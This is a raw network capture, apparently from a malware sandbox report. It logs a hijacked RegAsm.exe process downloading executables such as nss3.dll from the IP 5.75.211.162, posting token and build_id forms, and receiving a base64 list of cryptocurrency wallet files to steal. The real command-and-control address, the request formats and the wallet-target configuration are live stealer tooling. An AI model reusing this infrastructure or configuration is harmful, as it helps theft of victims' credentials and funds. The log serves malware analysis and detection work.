2024-09-26 23:49:34 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-09-26 23:49:34 UTC	16384	IN	Data Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
2024-09-26 23:49:34 UTC	16384	IN	Data Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
2024-09-26 23:49:34 UTC	16384	IN	Data Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-09-26 23:49:34 UTC	15605	IN	Data Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f Data Ascii: T@L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49726	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:35 UTC	193	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:35 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:35 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:49:35 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 23:49:35 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-09-26 23:49:35 UTC	16384	IN	Data Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MA
2024-09-26 23:49:35 UTC	16384	IN	Data Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-09-26 23:49:35 UTC	16384	IN	Data Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-09-26 23:49:35 UTC	16384	IN	Data Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-09-26 23:49:35 UTC	16384	IN	Data Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-09-26 23:49:35 UTC	16384	IN	Data Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b Data Ascii: d8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$
2024-09-26 23:49:35 UTC	16384	IN	Data Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
2024-09-26 23:49:35 UTC	16384	IN	Data Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff Data Ascii: Y`P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
2024-09-26 23:49:36 UTC	16384	IN	Data Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49727	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:38 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBAKKKFBGDHJKFHJJJJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 1081 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:38 UTC	1081	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 Data Ascii: ------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------GDBAKKKFBGDHJKFHJJJJCont
2024-09-26 23:49:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:39 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49728	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:40 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:40 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------JEGDGIIJJECFIDHJJKKFCont
2024-09-26 23:49:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:41 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49729	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:41 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECGDBFCBKFIDHIDHDHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:41 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 